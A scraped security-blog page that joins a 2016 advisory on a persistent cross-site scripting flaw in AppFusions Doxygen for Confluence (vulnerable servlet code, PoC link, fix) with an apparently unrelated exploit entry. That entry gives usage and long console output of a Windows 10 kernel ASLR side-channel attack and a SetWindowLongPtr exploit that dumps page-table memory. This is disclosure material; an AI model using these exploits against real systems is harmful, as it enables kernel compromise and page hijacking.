[RCESEC-2016-009] AppFusions Doxygen for Atlassian Confluence v1.3.2 renderContent() Persistent Cross-Site Scripting
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
=======================
Product: AppFusions Doxygen for Atlassian Confluence
Vendor URL: www.appfusions.com
Type: Cross-site Scripting [CWE-79]
Date found: 29/06/2016
Date published: 20/11/2016
CVSSv3 Score: 6.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N)
CVE: -
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
AppFusions Doxygen for Atlassian Confluence v1.3.3
AppFusions Doxygen for Atlassian Confluence v1.3.2
AppFusions Doxygen for Atlassian Confluence v1.3.1
AppFusions Doxygen for Atlassian Confluence v1.3.0
older versions may be affected too.
4. INTRODUCTION
===============
With Doxygen in Confluence, you can embed full-structure code documentation:
-Doxygen blueprint in Confluence to allow Doxygen archive imports
-Display documentation from annotated sources such as Java (i.e., JavaDoc),
C++, Objective-C, C#, C, PHP, Python, IDL (Corba, Microsoft, and UNO/OpenOffice
flavors), Fortran, VHDL, Tcl, D in Confluence.
-Navigation supports code structure (classes, hierarchies, files), element
dependencies, inheritance and collaboration diagrams.
-Search documentation from within Confluence
-Restrict access to who can see/add what
-Doxygen in JIRA also available
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
The application offers the functionality to import Doxygen documentations via a file upload to make them available in a Confluence page, but does not properly validate the file format/the contents of the uploaded Doxygen file. Since the uploaded file is basically a zipped archive, it is possible to store any type of file in it like an HTML file containing arbitrary script.
In DoxygenFileServlet.java (lines 82-105) the "file" GET parameter is read
and used as part of a File object:
private void renderContent(HttpServletRequest request, HttpServletResponse response) throws IOException {
String pathInfo = request.getPathInfo();
String[] pathInfoParts = pathInfo.split("file/");
String requestedFile = pathInfoParts[1];
File homeDirectory = this.applicationProperties.getHomeDirectory();
String doxygenDir = homeDirectory.getAbsolutePath() + File.separator + "doxygen";
File file = new File(doxygenDir, requestedFile);
String contentType = this.getServletContext().getMimeType(file.getName());
if (contentType == null) {
contentType = "application/octet-stream";
}
response.setContentType(contentType);
FileInputStream inputStream = null;
ServletOutputStream outputStream = null;
try {
inputStream = new FileInputStream(file);
outputStream = response.getOutputStream();
IOUtils.copy((InputStream)inputStream, (OutputStream)outputStream);
}
finally {
IOUtils.closeQuietly((InputStream)inputStream);
IOUtils.closeQuietly((OutputStream)outputStream);
}
}
6. RISK
=======
To successfully exploit this vulnerability, the attacker must be authenticated and must have the rights within Atlassian Confluence to upload
Doxygen files (default).
The vulnerability allows remote attackers to permanently embed arbitrary script code into the context of an Atlassian Confluence page, which offers a wide range of possible attacks such as redirecting users to arbitrary pages, present phishing content or attacking the browser and its components of a user visiting the page.
7. POC
===========
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40817.zip
8. SOLUTION
===========
Update to AppFusions Doxygen for Atlassian Confluence v1.3.4
9. REPORT TIMELINE (DD/MM/YYYY)
===============================
23/08/2016: Discovery of the vulnerability
23/08/2016: Sent preliminary advisory incl. PoC to known mail address
30/08/2016: No response, sent out another notification
30/08/2016: Vendor response, team is working on it
20/10/2016: Vendor releases v1.3.4 which fixes this vulnerability
20/11/2016: Advisory released
9. REFERENCES
=============
https://bugs.rcesecurity.com/redmine/issues/13
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863109207
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Complete Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40823.zip
Presentation:
https://www.exploit-db.com/docs/english/40822-i-know-where-your-page-lives---de-randomizing-the-latest-windows-10-kernel.pdf
I Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016
Requirements
Intel Processor (Haswell or newer)
Windows 10 x64
Usage
Run ASLRSideChannelAttack.exe to get the PML4-Self-Ref entry:
C:\Users\qa\Desktop>ASLRSideChannelAttack.exe
+] Setting thread affinity to CPU 0
+] Getting all the potential PML4 SelfRef
+] Mapping a page oracle
+] Allocating probing target pages...
Allocation 0: 0000020E339D0000
Allocation 1: 0000020E339E0000
Allocation 2: 0000020E339F0000
Allocation 3: 0000020E33A00000
Allocation 4: 0000020E33A10000
--------------------------
+] Check that Unammped and Mapped values are consistent across several executions!
--------------------------
Unmapped Initial: 256.683746
Mapped Initial: 203.692978
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 247.440018
Mapped: 202.827560
--------------------------
Potential SelfRef: FFFF8140A0502810
+] PTE FFFF81010719CE80 looks mapped! - Time: 207.127213
+] PTE FFFF81010719CF00 looks mapped! - Time: 195.239563
+] PTE FFFF81010719CF80 looks mapped! - Time: 192.401382
+] PTE FFFF81010719D000 looks mapped! - Time: 197.297256
+] PTE FFFF81010719D080 looks mapped! - Time: 194.501175
+] PTE FFFF810804020100 looks mapped! - Time: 204.740097
+] Removing 102 from initial array and pushing it into final array
Potential SelfRef: FFFF81C0E0703818
+] PTE FFFF81810719CE80 looks mapped! - Time: 200.837616
+] PTE FFFF81810719CF00 looks mapped! - Time: 207.868774
+] PTE FFFF81810719CF80 looks mapped! - Time: 208.949921
+] PTE FFFF81810719D000 looks mapped! - Time: 202.525726
+] PTE FFFF81810719D080 looks mapped! - Time: 208.673874
Time difference exceed for ffff818804020100, retrying...
+] PTE FFFF818804020100 looks mapped! - Time: 209.071213
+] Removing 103 from initial array and pushing it into final array
Time difference exceed for ffff824120904820, retrying...
Potential SelfRef: FFFF824120904820
+] PTE FFFF82010719CE80 looks mapped! - Time: 198.373642
Time difference exceed for ffff82010719cf00, retrying...
+] PTE FFFF82010719CF00 looks mapped! - Time: 206.213593
+] PTE FFFF82010719CF80 looks mapped! - Time: 210.637344
+] PTE FFFF82010719D000 looks mapped! - Time: 207.820862
+] PTE FFFF82010719D080 looks mapped! - Time: 197.229263
+] PTE FFFF820804020100 looks mapped! - Time: 204.585739
+] Removing 104 from initial array and pushing it into final array
Potential SelfRef: FFFF82C160B05828
+] PTE FFFF82810719CE80 looks mapped! - Time: 216.981003
Time difference exceed for ffff8341a0d06830, retrying...
Potential SelfRef: FFFF8341A0D06830
+] PTE FFFF83010719CE80 looks mapped! - Time: 201.957657
+] PTE FFFF83010719CF00 looks mapped! - Time: 202.023697
+] PTE FFFF83010719CF80 looks mapped! - Time: 212.651016
+] PTE FFFF83010719D000 looks mapped! - Time: 214.013504
+] PTE FFFF83010719D080 looks mapped! - Time: 191.688126
+] PTE FFFF830804020100 looks mapped! - Time: 193.314758
+] Removing 106 from initial array and pushing it into final array
Potential SelfRef: FFFF83C1E0F07838
+] PTE FFFF83810719CE80 looks mapped! - Time: 195.506973
+] PTE FFFF83810719CF00 looks mapped! - Time: 193.697693
+] PTE FFFF83810719CF80 looks mapped! - Time: 208.809097
+] PTE FFFF83810719D000 looks mapped! - Time: 216.298660
+] PTE FFFF83810719D080 looks mapped! - Time: 203.848816
+] PTE FFFF838804020100 looks mapped! - Time: 204.008743
+] Removing 107 from initial array and pushing it into final array
Time difference exceed for ffff89c4e2713898, retrying...
Time difference exceed for ffff8bc5e2f178b8, retrying...
Time difference exceed for ffff8c46231188c0, retrying...
Unmapped Initial: 248.508636
Mapped Initial: 207.139847
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 236.360733
Mapped: 195.650040
--------------------------
Potential SelfRef: FFFF8140A0502810
+] PTE FFFF81010719CE80 looks mapped! - Time: 197.312363
Potential SelfRef: FFFF81C0E0703818
Time difference exceed for ffff81810719ce80, retrying...
Time difference exceed for ffff81810719ce80, retrying...
Time difference exceed for ffff81810719ce80, retrying...
Time difference exceed for ffff81810719ce80, retrying...
+] PTE FFFF81810719CE80 looks mapped! - Time: 209.812393
Time difference exceed for ffff81810719cf00, retrying...
+] PTE FFFF81810719CF00 looks mapped! - Time: 207.951645
+] PTE FFFF81810719CF80 looks mapped! - Time: 200.001724
+] PTE FFFF81810719D000 looks mapped! - Time: 197.655167
+] PTE FFFF81810719D080 looks mapped! - Time: 201.667160
+] PTE FFFF818804020100 looks mapped! - Time: 195.728439
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF81C0E0703818 - Index: 103
PML4e: FFFF824120904820 - Index: 104
PML4e: FFFF8341A0D06830 - Index: 106
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff818000000000
-] Erasing 103 from final array
Potential SelfRef: FFFF824120904820
+] PTE FFFF82010719CE80 looks mapped! - Time: 206.883759
+] PTE FFFF82010719CF00 looks mapped! - Time: 208.451019
+] PTE FFFF82010719CF80 looks mapped! - Time: 201.073364
+] PTE FFFF82010719D000 looks mapped! - Time: 203.052826
+] PTE FFFF82010719D080 looks mapped! - Time: 194.115143
+] PTE FFFF820804020100 looks mapped! - Time: 198.158585
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF824120904820 - Index: 104
PML4e: FFFF8341A0D06830 - Index: 106
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff820000000000
-] Erasing 104 from final array
Potential SelfRef: FFFF8341A0D06830
+] PTE FFFF83010719CE80 looks mapped! - Time: 200.405823
+] PTE FFFF83010719CF00 looks mapped! - Time: 201.572525
+] PTE FFFF83010719CF80 looks mapped! - Time: 193.538040
+] PTE FFFF83010719D000 looks mapped! - Time: 196.066254
+] PTE FFFF83010719D080 looks mapped! - Time: 189.007034
+] PTE FFFF830804020100 looks mapped! - Time: 197.613953
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF8341A0D06830 - Index: 106
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff830000000000
-] Erasing 106 from final array
Potential SelfRef: FFFF83C1E0F07838
+] PTE FFFF83810719CE80 looks mapped! - Time: 200.655380
Time difference exceed for ffff83810719cf00, retrying...
Time difference exceed for ffff83810719cf00, retrying...
Unmapped Initial: 232.123840
Mapped Initial: 196.420654
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 234.845581
Mapped: 187.862518
--------------------------
Potential SelfRef: FFFF8140A0502810
+] PTE FFFF81010719CE80 looks mapped! - Time: 197.432938
+] PTE FFFF81010719CF00 looks mapped! - Time: 191.731766
Time difference exceed for ffff81010719cf80, retrying...
Time difference exceed for ffff81010719cf80, retrying...
Time difference exceed for ffff81010719cf80, retrying...
+] PTE FFFF81010719CF80 looks mapped! - Time: 201.003784
+] PTE FFFF81010719D000 looks mapped! - Time: 194.332733
+] PTE FFFF81010719D080 looks mapped! - Time: 200.211182
+] PTE FFFF810804020100 looks mapped! - Time: 199.812225
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff810000000000
Time difference exceed for ffff810000000000, retrying...
-] Erasing 102 from final array
Time difference exceed for ffff83c1e0f07838, retrying...
Potential SelfRef: FFFF83C1E0F07838
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Unmapped Initial: 230.247162
Mapped Initial: 198.023987
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 235.923035
Mapped: 191.605301
--------------------------
Time difference exceed for ffff83c1e0f07838, retrying...
Time difference exceed for ffff83c1e0f07838, retrying...
Potential SelfRef: FFFF83C1E0F07838
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Unmapped Initial: 258.041046
Mapped Initial: 210.309753
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 238.757538
Mapped: 203.896240
--------------------------
Potential SelfRef: FFFF83C1E0F07838
+] PTE FFFF83810719CE80 looks mapped! - Time: 210.036102
+] PTE FFFF83810719CF00 looks mapped! - Time: 199.200836
+] PTE FFFF83810719CF80 looks mapped! - Time: 204.575333
+] PTE FFFF83810719D000 looks mapped! - Time: 197.218445
+] PTE FFFF83810719D080 looks mapped! - Time: 203.334763
+] PTE FFFF838804020100 looks mapped! - Time: 203.243607
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff838000000000
-] Erasing 107 from final array
Potential SelfRef: FFFF82C160B05828
+] PTE FFFF82810719CE80 looks mapped! - Time: 201.889221
+] PTE FFFF82810719CF00 looks mapped! - Time: 201.679138
+] PTE FFFF82810719CF80 looks mapped! - Time: 204.281006
+] PTE FFFF82810719D000 looks mapped! - Time: 209.909943
+] PTE FFFF82810719D080 looks mapped! - Time: 202.795639
+] PTE FFFF828804020100 looks mapped! - Time: 196.754044
+] Removing 105 from initial array and pushing it into final array
Time difference exceed for ffff884422110880, retrying...
Time difference exceed for ffff884422110880, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff90c864321908, retrying...
Unmapped Initial: 257.754272
Mapped Initial: 207.903702
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 247.145935
Mapped: 207.792923
--------------------------
Potential SelfRef: FFFF82C160B05828
+] PTE FFFF82810719CE80 looks mapped! - Time: 208.554092
+] PTE FFFF82810719CF00 looks mapped! - Time: 206.517715
+] PTE FFFF82810719CF80 looks mapped! - Time: 216.576614
+] PTE FFFF82810719D000 looks mapped! - Time: 213.698837
+] PTE FFFF82810719D080 looks mapped! - Time: 210.162796
+] PTE FFFF828804020100 looks mapped! - Time: 208.765045
PML4e: FFFF82C160B05828 - Index: 105
KNOWN_UNMAPPED PTE: ffff828000000000
-] Erasing 105 from final array
-] Removing 100 as it seems to be unmapped
-] Removing 101 as it seems to be unmapped
-] Removing 108 as it seems to be unmapped
-] Removing 109 as it seems to be unmapped
-] Removing 10a as it seems to be unmapped
-] Removing 10b as it seems to be unmapped
-] Removing 10c as it seems to be unmapped
-] Removing 10d as it seems to be unmapped
Time difference exceed for ffff8743a1d0e870, retrying...
-] Removing 10e as it seems to be unmapped
-] Removing 10f as it seems to be unmapped
-] Removing 110 as it seems to be unmapped
Time difference exceed for ffff88c462311888, retrying...
-] Removing 111 as it seems to be unmapped
-] Removing 112 as it seems to be unmapped
-] Removing 113 as it seems to be unmapped
Time difference exceed for ffff8a45229148a0, retrying...
-] Removing 114 as it seems to be unmapped
-] Removing 115 as it seems to be unmapped
-] Removing 116 as it seems to be unmapped
-] Removing 117 as it seems to be unmapped
Time difference exceed for ffffbc5e2f178bc0, retrying...
Time difference exceed for ffffbc5e2f178bc0, retrying...
Time difference exceed for ffffe8f47a3d1e88, retrying...
Potential SelfRef: FFFFF67B3D9ECF60
+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.963379
+] PTE FFFFF6010719CF00 looks mapped! - Time: 212.917694
+] PTE FFFFF6010719CF80 looks mapped! - Time: 207.448502
+] PTE FFFFF6010719D000 looks mapped! - Time: 203.673920
+] PTE FFFFF6010719D080 looks mapped! - Time: 206.782059
+] PTE FFFFF60804020100 looks mapped! - Time: 211.636246
+] Removing 1ec from initial array and pushing it into final array
Unmapped Initial: 233.678802
Mapped Initial: 214.496124
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 250.585373
Mapped: 213.339661
--------------------------
Potential SelfRef: FFFFF67B3D9ECF60
+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.419174
+] PTE FFFFF6010719CF00 looks mapped! - Time: 199.196457
+] PTE FFFFF6010719CF80 looks mapped! - Time: 210.779861
+] PTE FFFFF6010719D000 looks mapped! - Time: 199.642334
+] PTE FFFFF6010719D080 looks mapped! - Time: 200.348160
+] PTE FFFFF60804020100 looks mapped! - Time: 204.036926
PML4e: FFFFF67B3D9ECF60 - Index: 1ec
KNOWN_UNMAPPED PTE: fffff60000000000
Real PML4 SelfRef Found: fffff67b3d9ecf60
Left in Potential Array: ffff8c46231188c0
Left in Potential Array: ffff8cc6633198c8
Left in Potential Array: ffff8d46a351a8d0
Left in Potential Array: ffff8dc6e371b8d8
Left in Potential Array: ffff8e472391c8e0
Left in Potential Array: ffff8ec763b1d8e8
Left in Potential Array: ffff8f47a3d1e8f0
Left in Potential Array: ffff8fc7e3f1f8f8
Left in Potential Array: ffff904824120900
Left in Potential Array: ffff90c864321908
Left in Potential Array: ffff9148a4522910
Left in Potential Array: ffff91c8e4723918
Left in Potential Array: ffff924924924920
Left in Potential Array: ffff92c964b25928
Left in Potential Array: ffff9349a4d26930
Left in Potential Array: ffff93c9e4f27938
Left in Potential Array: ffff944a25128940
Left in Potential Array: ffff94ca65329948
Left in Potential Array: ffff954aa552a950
Left in Potential Array: ffff95cae572b958
Left in Potential Array: ffff964b2592c960
Left in Potential Array: ffff96cb65b2d968
Left in Potential Array: ffff974ba5d2e970
Left in Potential Array: ffff97cbe5f2f978
Left in Potential Array: ffff984c26130980
Left in Potential Array: ffff98cc66331988
Left in Potential Array: ffff994ca6532990
Left in Potential Array: ffff99cce6733998
Left in Potential Array: ffff9a4d269349a0
Left in Potential Array: ffff9acd66b359a8
Left in Potential Array: ffff9b4da6d369b0
Left in Potential Array: ffff9bcde6f379b8
Left in Potential Array: ffff9c4e271389c0
Left in Potential Array: ffff9cce673399c8
Left in Potential Array: ffff9d4ea753a9d0
Left in Potential Array: ffff9dcee773b9d8
Left in Potential Array: ffff9e4f2793c9e0
Left in Potential Array: ffff9ecf67b3d9e8
Left in Potential Array: ffff9f4fa7d3e9f0
Left in Potential Array: ffff9fcfe7f3f9f8
Left in Potential Array: ffffa05028140a00
Left in Potential Array: ffffa0d068341a08
Left in Potential Array: ffffa150a8542a10
Left in Potential Array: ffffa1d0e8743a18
Left in Potential Array: ffffa25128944a20
Left in Potential Array: ffffa2d168b45a28
Left in Potential Array: ffffa351a8d46a30
Left in Potential Array: ffffa3d1e8f47a38
Left in Potential Array: ffffa45229148a40
Left in Potential Array: ffffa4d269349a48
Left in Potential Array: ffffa552a954aa50
Left in Potential Array: ffffa5d2e974ba58
Left in Potential Array: ffffa6532994ca60
Left in Potential Array: ffffa6d369b4da68
Left in Potential Array: ffffa753a9d4ea70
Left in Potential Array: ffffa7d3e9f4fa78
Left in Potential Array: ffffa8542a150a80
Left in Potential Array: ffffa8d46a351a88
Left in Potential Array: ffffa954aa552a90
Left in Potential Array: ffffa9d4ea753a98
Left in Potential Array: ffffaa552a954aa0
Left in Potential Array: ffffaad56ab55aa8
Left in Potential Array: ffffab55aad56ab0
Left in Potential Array: ffffabd5eaf57ab8
Left in Potential Array: ffffac562b158ac0
Left in Potential Array: ffffacd66b359ac8
Left in Potential Array: ffffad56ab55aad0
Left in Potential Array: ffffadd6eb75bad8
Left in Potential Array: ffffae572b95cae0
Left in Potential Array: ffffaed76bb5dae8
Left in Potential Array: ffffaf57abd5eaf0
Left in Potential Array: ffffafd7ebf5faf8
Left in Potential Array: ffffb0582c160b00
Left in Potential Array: ffffb0d86c361b08
Left in Potential Array: ffffb158ac562b10
Left in Potential Array: ffffb1d8ec763b18
Left in Potential Array: ffffb2592c964b20
Left in Potential Array: ffffb2d96cb65b28
Left in Potential Array: ffffb359acd66b30
Left in Potential Array: ffffb3d9ecf67b38
Left in Potential Array: ffffb45a2d168b40
Left in Potential Array: ffffb4da6d369b48
Left in Potential Array: ffffb55aad56ab50
Left in Potential Array: ffffb5daed76bb58
Left in Potential Array: ffffb65b2d96cb60
Left in Potential Array: ffffb6db6db6db68
Left in Potential Array: ffffb75badd6eb70
Left in Potential Array: ffffb7dbedf6fb78
Left in Potential Array: ffffb85c2e170b80
Left in Potential Array: ffffb8dc6e371b88
Left in Potential Array: ffffb95cae572b90
Left in Potential Array: ffffb9dcee773b98
Left in Potential Array: ffffba5d2e974ba0
Left in Potential Array: ffffbadd6eb75ba8
Left in Potential Array: ffffbb5daed76bb0
Left in Potential Array: ffffbbddeef77bb8
Left in Potential Array: ffffbc5e2f178bc0
Left in Potential Array: ffffbcde6f379bc8
Left in Potential Array: ffffbd5eaf57abd0
Left in Potential Array: ffffbddeef77bbd8
Left in Potential Array: ffffbe5f2f97cbe0
Left in Potential Array: ffffbedf6fb7dbe8
Left in Potential Array: ffffbf5fafd7ebf0
Left in Potential Array: ffffbfdfeff7fbf8
Left in Potential Array: ffffc06030180c00
Left in Potential Array: ffffc0e070381c08
Left in Potential Array: ffffc160b0582c10
Left in Potential Array: ffffc1e0f0783c18
Left in Potential Array: ffffc26130984c20
Left in Potential Array: ffffc2e170b85c28
Left in Potential Array: ffffc361b0d86c30
Left in Potential Array: ffffc3e1f0f87c38
Left in Potential Array: ffffc46231188c40
Left in Potential Array: ffffc4e271389c48
Left in Potential Array: ffffc562b158ac50
Left in Potential Array: ffffc5e2f178bc58
Left in Potential Array: ffffc6633198cc60
Left in Potential Array: ffffc6e371b8dc68
Left in Potential Array: ffffc763b1d8ec70
Left in Potential Array: ffffc7e3f1f8fc78
Left in Potential Array: ffffc86432190c80
Left in Potential Array: ffffc8e472391c88
Left in Potential Array: ffffc964b2592c90
Left in Potential Array: ffffc9e4f2793c98
Left in Potential Array: ffffca6532994ca0
Left in Potential Array: ffffcae572b95ca8
Left in Potential Array: ffffcb65b2d96cb0
Left in Potential Array: ffffcbe5f2f97cb8
Left in Potential Array: ffffcc6633198cc0
Left in Potential Array: ffffcce673399cc8
Left in Potential Array: ffffcd66b359acd0
Left in Potential Array: ffffcde6f379bcd8
Left in Potential Array: ffffce673399cce0
Left in Potential Array: ffffcee773b9dce8
Left in Potential Array: ffffcf67b3d9ecf0
Left in Potential Array: ffffcfe7f3f9fcf8
Left in Potential Array: ffffd068341a0d00
Left in Potential Array: ffffd0e8743a1d08
Left in Potential Array: ffffd168b45a2d10
Left in Potential Array: ffffd1e8f47a3d18
Left in Potential Array: ffffd269349a4d20
Left in Potential Array: ffffd2e974ba5d28
Left in Potential Array: ffffd369b4da6d30
Left in Potential Array: ffffd3e9f4fa7d38
Left in Potential Array: ffffd46a351a8d40
Left in Potential Array: ffffd4ea753a9d48
Left in Potential Array: ffffd56ab55aad50
Left in Potential Array: ffffd5eaf57abd58
Left in Potential Array: ffffd66b359acd60
Left in Potential Array: ffffd6eb75badd68
Left in Potential Array: ffffd76bb5daed70
Left in Potential Array: ffffd7ebf5fafd78
Left in Potential Array: ffffd86c361b0d80
Left in Potential Array: ffffd8ec763b1d88
Left in Potential Array: ffffd96cb65b2d90
Left in Potential Array: ffffd9ecf67b3d98
Left in Potential Array: ffffda6d369b4da0
Left in Potential Array: ffffdaed76bb5da8
Left in Potential Array: ffffdb6db6db6db0
Left in Potential Array: ffffdbedf6fb7db8
Left in Potential Array: ffffdc6e371b8dc0
Left in Potential Array: ffffdcee773b9dc8
Left in Potential Array: ffffdd6eb75badd0
Left in Potential Array: ffffddeef77bbdd8
Left in Potential Array: ffffde6f379bcde0
Left in Potential Array: ffffdeef77bbdde8
Left in Potential Array: ffffdf6fb7dbedf0
Left in Potential Array: ffffdfeff7fbfdf8
Left in Potential Array: ffffe070381c0e00
Left in Potential Array: ffffe0f0783c1e08
Left in Potential Array: ffffe170b85c2e10
Left in Potential Array: ffffe1f0f87c3e18
Left in Potential Array: ffffe271389c4e20
Left in Potential Array: ffffe2f178bc5e28
Left in Potential Array: ffffe371b8dc6e30
Left in Potential Array: ffffe3f1f8fc7e38
Left in Potential Array: ffffe472391c8e40
Left in Potential Array: ffffe4f2793c9e48
Left in Potential Array: ffffe572b95cae50
Left in Potential Array: ffffe5f2f97cbe58
Left in Potential Array: ffffe673399cce60
Left in Potential Array: ffffe6f379bcde68
Left in Potential Array: ffffe773b9dcee70
Left in Potential Array: ffffe7f3f9fcfe78
Left in Potential Array: ffffe8743a1d0e80
Left in Potential Array: ffffe8f47a3d1e88
Left in Potential Array: ffffe974ba5d2e90
Left in Potential Array: ffffe9f4fa7d3e98
Left in Potential Array: ffffea753a9d4ea0
Left in Potential Array: ffffeaf57abd5ea8
Left in Potential Array: ffffeb75badd6eb0
Left in Potential Array: ffffebf5fafd7eb8
Left in Potential Array: ffffec763b1d8ec0
Left in Potential Array: ffffecf67b3d9ec8
Left in Potential Array: ffffed76bb5daed0
Left in Potential Array: ffffedf6fb7dbed8
Left in Potential Array: ffffee773b9dcee0
Left in Potential Array: ffffeef77bbddee8
Left in Potential Array: ffffef77bbddeef0
Left in Potential Array: ffffeff7fbfdfef8
Left in Potential Array: fffff0783c1e0f00
Left in Potential Array: fffff0f87c3e1f08
Left in Potential Array: fffff178bc5e2f10
Left in Potential Array: fffff1f8fc7e3f18
Left in Potential Array: fffff2793c9e4f20
Left in Potential Array: fffff2f97cbe5f28
Left in Potential Array: fffff379bcde6f30
Left in Potential Array: fffff3f9fcfe7f38
Left in Potential Array: fffff47a3d1e8f40
Left in Potential Array: fffff4fa7d3e9f48
Left in Potential Array: fffff57abd5eaf50
Left in Potential Array: fffff5fafd7ebf58
Left in Potential Array: fffff6fb7dbedf68
Left in Potential Array: fffff77bbddeef70
Left in Potential Array: fffff7fbfdfeff78
Left in Potential Array: fffff87c3e1f0f80
Left in Potential Array: fffff8fc7e3f1f88
Left in Potential Array: fffff97cbe5f2f90
Left in Potential Array: fffff9fcfe7f3f98
Left in Potential Array: fffffa7d3e9f4fa0
Left in Potential Array: fffffafd7ebf5fa8
Left in Potential Array: fffffb7dbedf6fb0
Left in Potential Array: fffffbfdfeff7fb8
Left in Potential Array: fffffc7e3f1f8fc0
Left in Potential Array: fffffcfe7f3f9fc8
Left in Potential Array: fffffd7ebf5fafd0
Left in Potential Array: fffffdfeff7fbfd8
Left in Potential Array: fffffe7f3f9fcfe0
Left in Potential Array: fffffeff7fbfdfe8
Left in Potential Array: ffffff7fbfdfeff0
Left in Potential Array: fffffffffffffff8
Left in Final Array: fffff67b3d9ecf60
Result: fffff67b3d9ecf60
Run SetWindowLongPtr_Exploit.exe
C:\Users\qa\Desktop>SetWindowLongPtr_Exploit.exe fffff67b3d9ecf60
My PID is: 6056
Current Username: qa
PML4 Self Ref: FFFFF67B3D9ECF60
Enter to continue...
Value Self Ref = 8000000100211867
000000003D9EC000 | 67 a8 e2 61 00 00 c0 02 67 d8 d8 6b 00 00 d0 00 | g..a....g..k....
000000003D9EC010 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC020 | 67 68 81 08 01 00 90 01 00 00 00 00 00 00 00 00 | gh..............
000000003D9EC030 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC040 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC050 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC060 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC070 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC080 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC090 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC100 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC110 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC120 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC130 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC140 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC150 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC160 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC170 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC180 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
